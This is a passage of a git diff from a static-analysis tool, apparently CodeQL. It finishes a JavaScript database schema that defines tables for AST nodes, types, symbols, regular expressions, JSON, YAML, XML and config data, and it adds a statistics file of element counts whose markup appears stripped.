scope: @scope ref); + +is_arguments_object (int id: @variable ref); + +@lexical_name = @variable | @local_type_name | @local_namespace_name; + +@bind_id = @varaccess | @local_var_type_access; +bind (unique int id: @bind_id ref, + int decl: @variable ref); + +decl (unique int id: @var_decl ref, + int decl: @variable ref); + +@typebind_id = @local_type_access | @export_varaccess; +typebind (unique int id: @typebind_id ref, + int decl: @local_type_name ref); + +@typedecl_id = @type_decl | @var_decl; +typedecl (unique int id: @typedecl_id ref, + int decl: @local_type_name ref); + +namespacedecl (unique int id: @var_decl ref, + int decl: @local_namespace_name ref); + +@namespacebind_id = @local_namespace_access | @export_varaccess; +namespacebind (unique int id: @namespacebind_id ref, + int decl: @local_namespace_name ref); + + +// properties in object literals, property patterns in object patterns, and method declarations in classes +#keyset[parent, index] +properties (unique int id: @property, + int parent: @property_parent ref, + int index: int ref, + int kind: int ref, + varchar(900) tostring: string ref); + +case @property.kind of + 0 = @value_property +| 1 = @property_getter +| 2 = @property_setter +| 3 = @jsx_attribute +| 4 = @function_call_signature +| 5 = @constructor_call_signature +| 6 = @index_signature +| 7 = @enum_member +| 8 = @proper_field +| 9 = @parameter_field +| 10 = @static_initializer +; + +@property_parent = @obj_expr | @object_pattern | @class_definition | @jsx_element | @interface_definition | @enum_declaration; +@property_accessor = @property_getter | @property_setter; +@call_signature = @function_call_signature | @constructor_call_signature; +@field = @proper_field | @parameter_field; +@field_or_vardeclarator = @field | @var_declarator; + +is_computed (int id: @property ref); +is_method (int id: @property ref); +is_static (int id: @property ref); +is_abstract_member (int id: @property ref); +is_const_enum (int id: @enum_declaration ref); +is_abstract_class (int id: @class_decl_stmt ref); + +has_public_keyword (int id: @property ref); +has_private_keyword (int id: @property ref); +has_protected_keyword (int id: @property ref); +has_readonly_keyword (int id: @property ref); +has_type_keyword (int id: @type_keyword_operand ref); +is_optional_member (int id: @property ref); +has_definite_assignment_assertion (int id: @field_or_vardeclarator ref); +is_optional_parameter_declaration (unique int parameter: @pattern ref); + +#keyset[constructor, param_index] +parameter_fields( + unique int field: @parameter_field ref, + int constructor: @function_expr ref, + int param_index: int ref +); + +// types +#keyset[parent, idx] +typeexprs ( + unique int id: @typeexpr, + int kind: int ref, + int parent: @typeexpr_parent ref, + int idx: int ref, + varchar(900) tostring: string ref +); + +case @typeexpr.kind of + 0 = @local_type_access +| 1 = @type_decl +| 2 = @keyword_typeexpr +| 3 = @string_literal_typeexpr +| 4 = @number_literal_typeexpr +| 5 = @boolean_literal_typeexpr +| 6 = @array_typeexpr +| 7 = @union_typeexpr +| 8 = @indexed_access_typeexpr +| 9 = @intersection_typeexpr +| 10 = @parenthesized_typeexpr +| 11 = @tuple_typeexpr +| 12 = @keyof_typeexpr +| 13 = @qualified_type_access +| 14 = @generic_typeexpr +| 15 = @type_label +| 16 = @typeof_typeexpr +| 17 = @local_var_type_access +| 18 = @qualified_var_type_access +| 19 = @this_var_type_access +| 20 = @predicate_typeexpr +| 21 = @interface_typeexpr +| 22 = @type_parameter +| 23 = @plain_function_typeexpr +| 24 = @constructor_typeexpr +| 25 = @local_namespace_access +| 26 = @qualified_namespace_access +| 27 = @mapped_typeexpr +| 28 = @conditional_typeexpr +| 29 = @infer_typeexpr +| 30 = @import_type_access +| 31 = @import_namespace_access +| 32 = @import_var_type_access +| 33 = @optional_typeexpr +| 34 = @rest_typeexpr +| 35 = @bigint_literal_typeexpr +| 36 = @readonly_typeexpr +| 37 = @template_literal_typeexpr +; + +@typeref = @typeaccess | @type_decl; +@type_identifier = @type_decl | @local_type_access | @type_label | @local_var_type_access | @local_namespace_access; +@typeexpr_parent = @expr | @stmt | @property | @typeexpr; +@literal_typeexpr = @string_literal_typeexpr | @number_literal_typeexpr | @boolean_literal_typeexpr | @bigint_literal_typeexpr; +@typeaccess = @local_type_access | @qualified_type_access | @import_type_access; +@vartypeaccess = @local_var_type_access | @qualified_var_type_access | @this_var_type_access | @import_var_type_access; +@namespace_access = @local_namespace_access | @qualified_namespace_access | @import_namespace_access; +@import_typeexpr = @import_type_access | @import_namespace_access | @import_var_type_access; + +@function_typeexpr = @plain_function_typeexpr | @constructor_typeexpr; + +// types +types ( + unique int id: @type, + int kind: int ref, + varchar(900) tostring: string ref +); + +#keyset[parent, idx] +type_child ( + int child: @type ref, + int parent: @type ref, + int idx: int ref +); + +case @type.kind of + 0 = @any_type +| 1 = @string_type +| 2 = @number_type +| 3 = @union_type +| 4 = @true_type +| 5 = @false_type +| 6 = @type_reference +| 7 = @object_type +| 8 = @canonical_type_variable_type +| 9 = @typeof_type +| 10 = @void_type +| 11 = @undefined_type +| 12 = @null_type +| 13 = @never_type +| 14 = @plain_symbol_type +| 15 = @unique_symbol_type +| 16 = @objectkeyword_type +| 17 = @intersection_type +| 18 = @tuple_type +| 19 = @lexical_type_variable_type +| 20 = @this_type +| 21 = @number_literal_type +| 22 = @string_literal_type +| 23 = @unknown_type +| 24 = @bigint_type +| 25 = @bigint_literal_type +; + +@boolean_literal_type = @true_type | @false_type; +@symbol_type = @plain_symbol_type | @unique_symbol_type; +@union_or_intersection_type = @union_type | @intersection_type; +@typevariable_type = @canonical_type_variable_type | @lexical_type_variable_type; + +has_asserts_keyword(int node: @predicate_typeexpr ref); + +@typed_ast_node = @expr | @typeexpr | @function; +ast_node_type( + unique int node: @typed_ast_node ref, + int typ: @type ref); + +declared_function_signature( + unique int node: @function ref, + int sig: @signature_type ref +); + +invoke_expr_signature( + unique int node: @invokeexpr ref, + int sig: @signature_type ref +); + +invoke_expr_overload_index( + unique int node: @invokeexpr ref, + int index: int ref +); + +symbols ( + unique int id: @symbol, + int kind: int ref, + varchar(900) name: string ref +); + +symbol_parent ( + unique int symbol: @symbol ref, + int parent: @symbol ref +); + +symbol_module ( + int symbol: @symbol ref, + varchar(900) moduleName: string ref +); + +symbol_global ( + int symbol: @symbol ref, + varchar(900) globalName: string ref +); + +case @symbol.kind of + 0 = @root_symbol +| 1 = @member_symbol +| 2 = @other_symbol +; + +@type_with_symbol = @type_reference | @typevariable_type | @typeof_type | @unique_symbol_type; +@ast_node_with_symbol = @type_definition | @namespace_definition | @toplevel | @typeaccess | @namespace_access | @var_decl | @function | @invokeexpr | @import_declaration | @external_module_reference | @external_module_declaration; + +ast_node_symbol( + unique int node: @ast_node_with_symbol ref, + int symbol: @symbol ref); + +type_symbol( + unique int typ: @type_with_symbol ref, + int symbol: @symbol ref); + +#keyset[typ, name] +type_property( + int typ: @type ref, + varchar(900) name: string ref, + int propertyType: @type ref); + +type_alias( + unique int aliasType: @type ref, + int underlyingType: @type ref); + +@literal_type = @string_literal_type | @number_literal_type | @boolean_literal_type | @bigint_literal_type; +@type_with_literal_value = @string_literal_type | @number_literal_type | @bigint_literal_type; +type_literal_value( + unique int typ: @type_with_literal_value ref, + varchar(900) value: string ref); + +signature_types ( + unique int id: @signature_type, + int kind: int ref, + varchar(900) tostring: string ref, + int type_parameters: int ref, + int required_params: int ref +); + +is_abstract_signature( + unique int sig: @signature_type ref +); + +signature_rest_parameter( + unique int sig: @signature_type ref, + int rest_param_arra_type: @type ref +); + +case @signature_type.kind of + 0 = @function_signature_type +| 1 = @constructor_signature_type +; + +#keyset[typ, kind, index] +type_contains_signature ( + int typ: @type ref, + int kind: int ref, // constructor/call/index + int index: int ref, // ordering of overloaded signatures + int sig: @signature_type ref +); + +#keyset[parent, index] +signature_contains_type ( + int child: @type ref, + int parent: @signature_type ref, + int index: int ref +); + +#keyset[sig, index] +signature_parameter_name ( + int sig: @signature_type ref, + int index: int ref, + varchar(900) name: string ref +); + +number_index_type ( + unique int baseType: @type ref, + int propertyType: @type ref +); + +string_index_type ( + unique int baseType: @type ref, + int propertyType: @type ref +); + +base_type_names( + int typeName: @symbol ref, + int baseTypeName: @symbol ref +); + +self_types( + int typeName: @symbol ref, + int selfType: @type_reference ref +); + +tuple_type_min_length( + unique int typ: @type ref, + int minLength: int ref +); + +tuple_type_rest_index( + unique int typ: @type ref, + int index: int ref +); + +// comments +comments (unique int id: @comment, + int kind: int ref, + int toplevel: @toplevel ref, + varchar(900) text: string ref, + varchar(900) tostring: string ref); + +case @comment.kind of + 0 = @slashslash_comment +| 1 = @slashstar_comment +| 2 = @doc_comment +| 3 = @html_comment_start +| 4 = @htmlcommentend; + +@html_comment = @html_comment_start | @htmlcommentend; +@line_comment = @slashslash_comment | @html_comment; +@block_comment = @slashstar_comment | @doc_comment; + +// source lines +lines (unique int id: @line, + int toplevel: @toplevel ref, + varchar(900) text: string ref, + varchar(2) terminator: string ref); +indentation (int file: @file ref, + int lineno: int ref, + varchar(1) indentChar: string ref, + int indentDepth: int ref); + +// JavaScript parse errors +js_parse_errors (unique int id: @js_parse_error, + int toplevel: @toplevel ref, + varchar(900) message: string ref, + varchar(900) line: string ref); + +// regular expressions +#keyset[parent, idx] +regexpterm (unique int id: @regexpterm, + int kind: int ref, + int parent: @regexpparent ref, + int idx: int ref, + varchar(900) tostring: string ref); + +@regexpparent = @regexpterm | @regexp_literal | @string_literal | @add_expr; + +case @regexpterm.kind of + 0 = @regexp_alt +| 1 = @regexp_seq +| 2 = @regexp_caret +| 3 = @regexp_dollar +| 4 = @regexp_wordboundary +| 5 = @regexp_nonwordboundary +| 6 = @regexp_positive_lookahead +| 7 = @regexp_negative_lookahead +| 8 = @regexp_star +| 9 = @regexp_plus +| 10 = @regexp_opt +| 11 = @regexp_range +| 12 = @regexp_dot +| 13 = @regexp_group +| 14 = @regexp_normal_constant +| 15 = @regexp_hex_escape +| 16 = @regexp_unicode_escape +| 17 = @regexp_dec_escape +| 18 = @regexp_oct_escape +| 19 = @regexp_ctrl_escape +| 20 = @regexp_char_class_escape +| 21 = @regexp_id_escape +| 22 = @regexp_backref +| 23 = @regexp_char_class +| 24 = @regexp_char_range +| 25 = @regexp_positive_lookbehind +| 26 = @regexp_negative_lookbehind +| 27 = @regexp_unicode_property_escape; + +regexp_parse_errors (unique int id: @regexp_parse_error, + int regexp: @regexpterm ref, + varchar(900) message: string ref); + +@regexp_quantifier = @regexp_star | @regexp_plus | @regexp_opt | @regexp_range; +@regexp_escape = @regexp_char_escape | @regexp_char_class_escape | @regexp_unicode_property_escape; +@regexp_char_escape = @regexp_hex_escape | @regexp_unicode_escape | @regexp_dec_escape | @regexp_oct_escape | @regexp_ctrl_escape | @regexp_id_escape; +@regexp_constant = @regexp_normal_constant | @regexp_char_escape; +@regexp_lookahead = @regexp_positive_lookahead | @regexp_negative_lookahead; +@regexp_lookbehind = @regexp_positive_lookbehind | @regexp_negative_lookbehind; +@regexp_subpattern = @regexp_lookahead | @regexp_lookbehind; +@regexp_anchor = @regexp_dollar | @regexp_caret; + +is_greedy (int id: @regexp_quantifier ref); +range_quantifier_lower_bound (unique int id: @regexp_range ref, int lo: int ref); +range_quantifier_upper_bound (unique int id: @regexp_range ref, int hi: int ref); +is_capture (unique int id: @regexp_group ref, int number: int ref); +is_named_capture (unique int id: @regexp_group ref, string name: string ref); +is_inverted (int id: @regexp_char_class ref); +regexp_const_value (unique int id: @regexp_constant ref, varchar(1) value: string ref); +char_class_escape (unique int id: @regexp_char_class_escape ref, varchar(1) value: string ref); +backref (unique int id: @regexp_backref ref, int value: int ref); +named_backref (unique int id: @regexp_backref ref, string name: string ref); +unicode_property_escapename (unique int id: @regexp_unicode_property_escape ref, string name: string ref); +unicode_property_escapevalue (unique int id: @regexp_unicode_property_escape ref, string value: string ref); + +// tokens +#keyset[toplevel, idx] +tokeninfo (unique int id: @token, + int kind: int ref, + int toplevel: @toplevel ref, + int idx: int ref, + varchar(900) value: string ref); + +case @token.kind of + 0 = @token_eof +| 1 = @token_null_literal +| 2 = @token_boolean_literal +| 3 = @token_numeric_literal +| 4 = @token_string_literal +| 5 = @token_regular_expression +| 6 = @token_identifier +| 7 = @token_keyword +| 8 = @token_punctuator; + +// associate comments with the token immediately following them (which may be EOF) +next_token (int comment: @comment ref, int token: @token ref); + +// JSON +#keyset[parent, idx] +json (unique int id: @json_value, + int kind: int ref, + int parent: @json_parent ref, + int idx: int ref, + varchar(900) tostring: string ref); + +json_literals (varchar(900) value: string ref, + varchar(900) raw: string ref, + unique int expr: @json_value ref); + +json_properties (int obj: @json_object ref, + varchar(900) property: string ref, + int value: @json_value ref); + +json_errors (unique int id: @json_parse_error, + varchar(900) message: string ref); + +json_locations(unique int locatable: @json_locatable ref, + int location: @location_default ref); + +case @json_value.kind of + 0 = @json_null +| 1 = @json_boolean +| 2 = @json_number +| 3 = @json_string +| 4 = @json_array +| 5 = @json_object; + +@json_parent = @json_object | @json_array | @file; + +@json_locatable = @json_value | @json_parse_error; + +// locations +@ast_node = @toplevel | @stmt | @expr | @property | @typeexpr; + +@locatable = @file + | @ast_node + | @comment + | @line + | @js_parse_error | @regexp_parse_error + | @regexpterm + | @json_locatable + | @token + | @cfg_node + | @jsdoc | @jsdoc_type_expr | @jsdoc_tag + | @yaml_locatable + | @xmllocatable + | @configLocatable + | @template_placeholder_tag; + +hasLocation (unique int locatable: @locatable ref, + int location: @location ref); + +// CFG +entry_cfg_node (unique int id: @entry_node, int container: @stmt_container ref); +exit_cfg_node (unique int id: @exit_node, int container: @stmt_container ref); +guard_node (unique int id: @guard_node, int kind: int ref, int test: @expr ref); +case @guard_node.kind of + 0 = @falsy_guard +| 1 = @truthy_guard; +@condition_guard = @falsy_guard | @truthy_guard; + +@synthetic_cfg_node = @entry_node | @exit_node | @guard_node; +@cfg_node = @synthetic_cfg_node | @expr_parent; + +successor (int pred: @cfg_node ref, int succ: @cfg_node ref); + +// JSDoc comments +jsdoc (unique int id: @jsdoc, varchar(900) description: string ref, int comment: @comment ref); +#keyset[parent, idx] +jsdoc_tags (unique int id: @jsdoc_tag, varchar(900) title: string ref, + int parent: @jsdoc ref, int idx: int ref, varchar(900) tostring: string ref); +jsdoc_tag_descriptions (unique int tag: @jsdoc_tag ref, varchar(900) text: string ref); +jsdoc_tag_names (unique int tag: @jsdoc_tag ref, varchar(900) text: string ref); + +#keyset[parent, idx] +jsdoc_type_exprs (unique int id: @jsdoc_type_expr, + int kind: int ref, + int parent: @jsdoc_type_expr_parent ref, + int idx: int ref, + varchar(900) tostring: string ref); +case @jsdoc_type_expr.kind of + 0 = @jsdoc_any_type_expr +| 1 = @jsdoc_null_type_expr +| 2 = @jsdoc_undefined_type_expr +| 3 = @jsdoc_unknown_type_expr +| 4 = @jsdoc_void_type_expr +| 5 = @jsdoc_named_type_expr +| 6 = @jsdoc_applied_type_expr +| 7 = @jsdoc_nullable_type_expr +| 8 = @jsdoc_non_nullable_type_expr +| 9 = @jsdoc_record_type_expr +| 10 = @jsdoc_array_type_expr +| 11 = @jsdoc_union_type_expr +| 12 = @jsdoc_function_type_expr +| 13 = @jsdoc_optional_type_expr +| 14 = @jsdoc_rest_type_expr +; + +#keyset[id, idx] +jsdoc_record_field_name (int id: @jsdoc_record_type_expr ref, int idx: int ref, varchar(900) name: string ref); +jsdoc_prefix_qualifier (int id: @jsdoc_type_expr ref); +jsdoc_has_new_parameter (int fn: @jsdoc_function_type_expr ref); + +@jsdoc_type_expr_parent = @jsdoc_type_expr | @jsdoc_tag; + +jsdoc_errors (unique int id: @jsdoc_error, int tag: @jsdoc_tag ref, varchar(900) message: string ref, varchar(900) tostring: string ref); + +@dataflownode = @expr | @function_decl_stmt | @class_decl_stmt | @namespace_declaration | @enum_declaration | @property; + +@optionalchainable = @call_expr | @propaccess; + +isOptionalChaining(int id: @optionalchainable ref); + +/** + * The time taken for the extraction of a file. + * This table contains non-deterministic content. + * + * The sum of the `time` column for each (`file`, `timerKind`) pair + * is the total time taken for extraction of `file`. The `extractionPhase` + * column provides a granular view of the extraction time of the file. + */ +extraction_time( + int file : @file ref, + // see `com.semmle.js.extractor.ExtractionMetrics.ExtractionPhase`. + int extractionPhase: int ref, + // 0 for the elapsed CPU time in nanoseconds, 1 for the elapsed wallclock time in nanoseconds + int timerKind: int ref, + float time: float ref +) + +/** +* Non-timing related data for the extraction of a single file. +* This table contains non-deterministic content. +*/ +extraction_data( + int file : @file ref, + // the absolute path to the cache file + varchar(900) cacheFile: string ref, + boolean fromCache: boolean ref, + int length: int ref +) + +/*- YAML -*/ + +#keyset[parent, idx] +yaml (unique int id: @yaml_node, + int kind: int ref, + int parent: @yaml_node_parent ref, + int idx: int ref, + string tag: string ref, + string tostring: string ref); + +case @yaml_node.kind of + 0 = @yaml_scalar_node +| 1 = @yaml_mapping_node +| 2 = @yaml_sequence_node +| 3 = @yaml_alias_node +; + +@yaml_collection_node = @yaml_mapping_node | @yaml_sequence_node; + +@yaml_node_parent = @yaml_collection_node | @file; + +yaml_anchors (unique int node: @yaml_node ref, + string anchor: string ref); + +yaml_aliases (unique int alias: @yaml_alias_node ref, + string target: string ref); + +yaml_scalars (unique int scalar: @yaml_scalar_node ref, + int style: int ref, + string value: string ref); + +yaml_errors (unique int id: @yaml_error, + string message: string ref); + +yaml_locations(unique int locatable: @yaml_locatable ref, + int location: @location_default ref); + +@yaml_locatable = @yaml_node | @yaml_error; + +/*- XML Files -*/ + +xmlEncoding( + unique int id: @file ref, + string encoding: string ref +); + +xmlDTDs( + unique int id: @xmldtd, + string root: string ref, + string publicId: string ref, + string systemId: string ref, + int fileid: @file ref +); + +xmlElements( + unique int id: @xmlelement, + string name: string ref, + int parentid: @xmlparent ref, + int idx: int ref, + int fileid: @file ref +); + +xmlAttrs( + unique int id: @xmlattribute, + int elementid: @xmlelement ref, + string name: string ref, + string value: string ref, + int idx: int ref, + int fileid: @file ref +); + +xmlNs( + int id: @xmlnamespace, + string prefixName: string ref, + string URI: string ref, + int fileid: @file ref +); + +xmlHasNs( + int elementId: @xmlnamespaceable ref, + int nsId: @xmlnamespace ref, + int fileid: @file ref +); + +xmlComments( + unique int id: @xmlcomment, + string text: string ref, + int parentid: @xmlparent ref, + int fileid: @file ref +); + +xmlChars( + unique int id: @xmlcharacters, + string text: string ref, + int parentid: @xmlparent ref, + int idx: int ref, + int isCDATA: int ref, + int fileid: @file ref +); + +@xmlparent = @file | @xmlelement; +@xmlnamespaceable = @xmlelement | @xmlattribute; + +xmllocations( + int xmlElement: @xmllocatable ref, + int location: @location_default ref +); + +@xmllocatable = @xmlcharacters | @xmlelement | @xmlcomment | @xmlattribute | @xmldtd | @file | @xmlnamespace; + +/*- Configuration files with key value pairs -*/ + +configs( + unique int id: @config +); + +configNames( + unique int id: @configName, + int config: @config ref, + string name: string ref +); + +configValues( + unique int id: @configValue, + int config: @config ref, + string value: string ref +); + +configLocations( + int locatable: @configLocatable ref, + int location: @location_default ref +); + +@configLocatable = @config | @configName | @configValue; diff --git a/ql/src/semmlecode.javascript.dbscheme.stats b/ql/src/semmlecode.javascript.dbscheme.stats new file mode 100644 index 00000000000..97ba6f9bcc3 --- /dev/null +++ b/ql/src/semmlecode.javascript.dbscheme.stats @@ -0,0 +1,28248 @@ + + + + +@location_default +15664049 + + +@file +6457 + + +@folder +1590 + + +@externalDataElement +950 + + +@toplevel +5320 + + +@script +5200 + + +@inline_script +86 + + +@event_handler +31 + + +@javascript_url +3 + + +@template_toplevel +100 + + +@stmt +1096691 + + +@empty_stmt +1136 + + +@block_stmt +204994 + + +@expr_stmt +610340 + + +@if_stmt +68214 + + +@labeled_stmt +1378 + + +@break_stmt +10149 + + +@continue_stmt +1642 + + +@with_stmt +4 + + +@switch_stmt +1569 + + +@return_stmt +48209 + + +@throw_stmt +2305 + + +@try_stmt +1316 + + +@while_stmt +3120 + + +@do_while_stmt +1471 + + +@for_stmt +5385 + + +@for_in_stmt +1315 + + +@debugger_stmt +3 + + +@function_decl_stmt +16771 + + +@var_decl_stmt +105606 + + +@case +8674 + + +@catch_clause +1272 + + +@for_of_stmt +61 + + +@const_decl_stmt +1118 + + +@let_stmt +551 + + +@legacy_let_stmt +1 + + +@for_each_stmt +1 + + +@class_decl_stmt +41 + + +@import_declaration +8 + + +@export_all_declaration +1 + + +@export_as_namespace_declaration +5 + + +@global_augmentation_declaration +5 + + +@using_decl_stmt +5 + + +@export_default_declaration +5 + + +@export_named_declaration +31 + + +@expr +5495305 + + +@label +722373 + + +@null_literal +15525 + + +@boolean_literal +31652 + + +@number_literal +557620 + + +@string_literal +268843 + + +@regexp_literal +2773 + + +@this_expr +128651 + + +@array_expr +28131 + + +@obj_expr +50958 + + +@function_expr +95744 + + +@seq_expr +2457 + + +@conditional_expr +8111 + + +@new_expr +19023 + + +@call_expr +487075 + + +@dot_expr +602582 + + +@index_expr +105192 + + +@neg_expr +11993 + + +@plus_expr +731 + + +@log_not_expr +19385 + + +@bit_not_expr +403 + + +@typeof_expr +4540 + + +@void_expr +51 + + +@delete_expr +1310 + + +@eq_expr +13468 + + +@neq_expr +5338 + + +@eqq_expr +17758 + + +@neqq_expr +5818 + + +@lt_expr +10254 + + +@le_expr +1503 + + +@gt_expr +5438 + + +@ge_expr +2527 + + +@lshift_expr +5655 + + +@rshift_expr +27749 + + +@urshift_expr +4331 + + +@add_expr +88032 + + +@sub_expr +10789 + + +@mul_expr +14075 + + +@div_expr +2496 + + +@mod_expr +655 + + +@bitor_expr +42853 + + +@xor_expr +503 + + +@bitand_expr +8538 + + +@in_expr +1135 + + +@instanceof_expr +1184 + + +@logand_expr +15892 + + +@logor_expr +12711 + + +@assign_expr +245084 + + +@assign_add_expr +6231 + + +@assign_sub_expr +823 + + +@assign_mul_expr +143 + + +@assign_div_expr +44 + + +@assign_mod_expr +17 + + +@assign_lshift_expr +57 + + +@assign_rshift_expr +86 + + +@assign_urshift_expr +96 + + +@assign_or_expr +586 + + +@assign_xor_expr +108 + + +@assign_and_expr +222 + + +@assignlogandexpr +1 + + +@assignlogorexpr +1 + + +@assignnullishcoalescingexpr +1 + + +@template_placeholder_tag +100 + + +@template_pipe_ref +100 + + +@generated_code_expr +100 + + +@satisfies_expr +100 + + +@preinc_expr +1792 + + +@postinc_expr +7103 + + +@predec_expr +457 + + +@postdec_expr +774 + + +@par_expr +86199 + + +@var_declarator +130843 + + +@arrow_function_expr +3730 + + +@spread_element +50 + + +@array_pattern +57 + + +@object_pattern +122 + + +@yield_expr +81 + + +@tagged_template_expr +27 + + +@template_literal +408 + + +@template_literal_typeexpr +100 + + +@template_element +639 + + +@array_comprehension_expr +3 + + +@generator_expr +1 + + +@for_in_comprehension_block +1 + + +@for_of_comprehension_block +3 + + +@legacy_letexpr +1 + + +@var_decl +250257 + + +@proper_varaccess +1295408 + + +@super_expr +11 + + +@newtarget_expr +1 + + +@import_meta_expr +1 + + +@named_import_specifier +4 + + +@import_default_specifier +4 + + +@import_namespace_specifier +2 + + +@named_export_specifier +5 + + +@export_default_specifier +5 + + +@export_namespace_specifier +5 + + +@export_assign_declaration +5 + + +@interface_declaration +5 + + +@type_alias_declaration +120 + + +@enum_declaration +252 + + +@external_module_declaration +100 + + +@external_module_reference +5 + + +@expression_with_type_arguments +45 + + +@prefix_type_assertion +1721 + + +@as_type_assertion +368 + + +@export_varaccess +15 + + +@decorator_list +2575 + + +@non_null_assertion +2159 + + +@dynamic_import +5 + + +@import_equals_declaration +5 + + +@namespace_declaration +5 + + +@namespace_scope +5 + + +@exp_expr +14075 + + +@assign_exp_expr +143 + + +@class_expr +41 + + +@scope +118172 + + +@global_scope +1 + + +@function_scope +116245 + + +@catch_scope +1272 + + +@module_scope +21 + + +@block_scope +584 + + +@for_scope +17 + + +@for_in_scope +28 + + +@comprehension_block_scope +4 + + +@class_expr_scope +41 + + +@class_decl_scope +2693 + + +@interface_scope +200 + + +@type_alias_scope +11 + + +@enum_scope +252 + + +@external_module_scope +100 + + +@mapped_type_scope +10 + + +@conditional_type_scope +100 + + +@variable +364388 + + +@local_type_name +23565 + + +@local_namespace_name +20832 + + +@property +142723 + + +@value_property +140856 + + +@property_getter +1529 + + +@property_setter +338 + + +@jsx_attribute +100 + + +@function_call_signature +2458 + + +@constructor_call_signature +37 + + +@index_signature +504 + + +@enum_member +2026 + + +@proper_field +16934 + + +@parameter_field +2693 + + +@static_initializer +100 + + +@local_type_access +25491 + + +@type_decl +2513 + + +@keyword_typeexpr +25306 + + +@string_literal_typeexpr +733 + + +@number_literal_typeexpr +3 + + +@boolean_literal_typeexpr +4 + + +@array_typeexpr +4579 + + +@union_typeexpr +852 + + +@intersection_typeexpr +27 + + +@parenthesized_typeexpr +62 + + +@tuple_typeexpr +98 + + +@keyof_typeexpr +3 + + +@indexed_access_typeexpr +3 + + +@qualified_type_access +3559 + + +@import_namespace_access +100 + + +@import_type_access +100 + + +@import_var_type_access +100 + + +@optional_typeexpr +100 + + +@rest_typeexpr +100 + + +@readonly_typeexpr +100 + + +@bigint_literal_typeexpr +100 + + +@generic_typeexpr +5220 + + +@type_label +3559 + + +@typeof_typeexpr +24 + + +@local_var_type_access +24 + + +@qualified_var_type_access +15 + + +@this_var_type_access +20 + + +@predicate_typeexpr +86 + + +@interface_typeexpr +1038 + + +@type_parameter +3463 + + +@plain_function_typeexpr +1674 + + +@local_namespace_access +4671 + + +@qualified_namespace_access +20 + + +@constructor_typeexpr +20 + + +@mapped_typeexpr +20 + + +@conditional_typeexpr +100 + + +@infer_typeexpr +100 + + +@comment +104947 + + +@any_type +1 + + +@string_type +1 + + +@number_type +1 + + +@union_type +1802 + + +@true_type +1 + + +@false_type +1 + + +@type_reference +12383 + + +@object_type +159099 + + +@canonical_type_variable_type +650 + + +@typeof_type +2903 + + +@void_type +1 + + +@undefined_type +1 + + +@null_type +1 + + +@never_type +1 + + +@plain_symbol_type +1 + + +@objectkeyword_type +1 + + +@intersection_type +369 + + +@tuple_type +307 + + +@lexical_type_variable_type +50 + + +@this_type +2731 + + +@number_literal_type +1244 + + +@string_literal_type +30638 + + +@unknown_type +100 + + +@bigint_type +100 + + +@bigint_literal_type +100 + + +@unique_symbol_type +100 + + +@root_symbol +2385 + + +@member_symbol +7223 + + +@other_symbol +584 + + +@function_signature_type +34698 + + +@constructor_signature_type +2646 + + +@slashslash_comment +76841 + + +@slashstar_comment +8834 + + +@doc_comment +19270 + + +@html_comment_start +1 + + +@htmlcommentend +1 + + +@line +1622184 + + +@js_parse_error +8 + + +@regexpterm +33197 + + +@regexp_alt +641 + + +@regexp_seq +3371 + + +@regexp_caret +826 + + +@regexp_dollar +637 + + +@regexp_wordboundary +99 + + +@regexp_nonwordboundary +3 + + +@regexp_positive_lookahead +15 + + +@regexp_negative_lookahead +12 + + +@regexp_star +1057 + + +@regexp_plus +1067 + + +@regexp_opt +478 + + +@regexp_range +146 + + +@regexp_dot +445 + + +@regexp_group +1692 + + +@regexp_normal_constant +15489 + + +@regexp_hex_escape +59 + + +@regexp_unicode_escape +264 + + +@regexp_dec_escape +7 + + +@regexp_oct_escape +1 + + +@regexp_ctrl_escape +599 + + +@regexp_char_class_escape +1573 + + +@regexp_id_escape +2613 + + +@regexp_backref +11 + + +@regexp_char_class +1473 + + +@regexp_char_range +619 + + +@regexp_positive_lookbehind +15 + + +@regexp_negative_lookbehind +12 + + +@regexp_unicode_property_escape +12 + + +@regexp_parse_error +122 + + +@token +8770869 + + +@token_eof +5312 + + +@token_null_literal +15526 + + +@token_boolean_literal +31654 + + +@token_numeric_literal +557620 + + +@token_string_literal +269555 + + +@token_regular_expression +2773 + + +@token_identifier +2268328 + + +@token_keyword +551767 + + +@token_punctuator +5068334 + + +@json_value +1643352 + + +@json_null +24 + + +@json_boolean +654 + + +@json_number +273113 + + +@json_string +752355 + + +@json_array +175925 + + +@json_object +441281 + + +@json_parse_error +1 + + +@entry_node +121542 + + +@exit_node +121542 + + +@guard_node +177785 + + +@jsdoc +19270 + + +@falsy_guard +86336 + + +@truthy_guard +91449 + + +@jsdoc_tag +29323 + + +@jsdoc_type_expr +22481 + + +@jsdoc_any_type_expr +292 + + +@jsdoc_null_type_expr +35 + + +@jsdoc_undefined_type_expr +287 + + +@jsdoc_unknown_type_expr +27 + + +@jsdoc_void_type_expr +8 + + +@jsdoc_named_type_expr +18639 + + +@jsdoc_applied_type_expr +303 + + +@jsdoc_nullable_type_expr +310 + + +@jsdoc_non_nullable_type_expr +536 + + +@jsdoc_record_type_expr +91 + + +@jsdoc_array_type_expr +19 + + +@jsdoc_union_type_expr +668 + + +@jsdoc_function_type_expr +316 + + +@jsdoc_optional_type_expr +895 + + +@jsdoc_rest_type_expr +55 + + +@jsdoc_error +1658 + + +@yaml_node +885 + + +@yaml_scalar_node +700 + + +@yaml_mapping_node +149 + + +@yaml_sequence_node +35 + + +@yaml_alias_node +1 + + +@yaml_error +1 + + +@jsx_element +1090 + + +@jsx_qualified_name +100 + + +@jsx_empty_expr +100 + + +@await_expr +100 + + +@function_sent_expr +100 + + +@decorator +100 + + +@bind_expr +100 + + +@bigint_literal +100 + + +@nullishcoalescing_expr +100 + + +@e4x_xml_anyname +100 + + +@e4x_xml_static_attribute_selector +100 + + +@e4x_xml_dynamic_attribute_selector +100 + + +@e4x_xml_filter_expression +100 + + +@e4x_xml_static_qualident +100 + + +@e4x_xml_dynamic_qualident +100 + + +@e4x_xml_dotdotexpr +100 + + +@xmldtd +1 + + +@xmlelement +1270313 + + +@xmlattribute +1202020 + + +@xmlnamespace +4185 + + +@xmlcomment +26812 + + +@xmlcharacters +439958 + + +@optionalchainable +100 + + +@nullishcoalescing_expr +100 + + +@config +69795 + + +@configName +69794 + + +@configValue +69691 + + + + + +locations_default +id +15664049 + + +id +15664049 + + +file +6457 + + +beginLine +277405 + + +beginColumn +117878 + + +endLine +277405 + + +endColumn +117868 + + + + +id +file + + +12 + + +1 +2 +15664049 + + + + + + +id +beginLine + + +12 + + +1 +2 +15664049 + + + + + + +id +beginColumn + + +12 + + +1 +2 +15664049 + + + + + + +id +endLine + + +12 + + +1 +2 +15664049 + + + + + + +id 